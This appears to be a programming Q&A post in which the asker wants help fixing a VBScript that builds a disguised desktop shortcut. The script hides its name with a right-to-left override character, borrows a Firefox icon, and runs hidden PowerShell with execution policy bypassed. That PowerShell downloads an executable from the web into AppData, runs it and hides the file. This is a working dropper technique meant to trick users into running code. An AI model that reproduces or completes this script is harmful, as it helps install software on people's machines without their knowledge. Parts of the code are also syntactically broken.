# How can I execute downloaded file in download location in Vbscript?

Tags: vbscript

I am trying to make a shortcut file that download putty.exe into %appdata% directory and also execute the downloaded file in windows uding vbscript but the active script below only download putty.exe into %appdata% directory without executing the setup file downloaded into %appdata%.

```
Dim DownLoadLink, FileName DownLoadLink = "'https://the.earth.li/~sgtatham/putty/latest/w32/putty.exe'" FileName = "'%AppData%\putty.exe'" Set WshShell = CreateObject("WScript.Shell") Set ShApp = CreateObject("Shell.Application") DesktopPath = ShApp.Namespace(0).Self.Path unicode = Unescape("%u0052%u0065%u0061%u0064%u004d%u0065%u005f%u202e%u0074%u0078%u0074%u002e%u006c%u006e%u006b") unicodeName = "unicode.lnk" shortcutPath = DesktopPath & "\" & unicodeName Set lnk WshShell.CreateShortcut(shortcutPath) lnk.TargetPath = "powershell.exe" lnk.Arguments =  "-ExecutionPolicy Bypass -WindowStyle Hidden -Command notepad.exe;(new-object System.Net.WebClient).DownloadFile(" & DownLoadLink & "," & FileName & ");./" & Filename & ";(get item " & Filename & ").Attributes += 'Hidden';" lnk.IconLocation = "C:\Program Files (x86)\Mozilla Firefox\firefox.exe" lnk.Description = "Type: Shortcut File" lnk.Save() Set FSO = CreateObject("Scripting.FileSystemObject") Set file = FSO.GetFile(shortcutPath) file.name = unicode & ".exe"
```

Any prossible solution this problem will be appreciated. Thanks

Comment: Put it on multiple lines.

Comment: https://stackoverflow.com/questions/24275797/download-file-from-dynamic-link-using-vbscript-or-powershell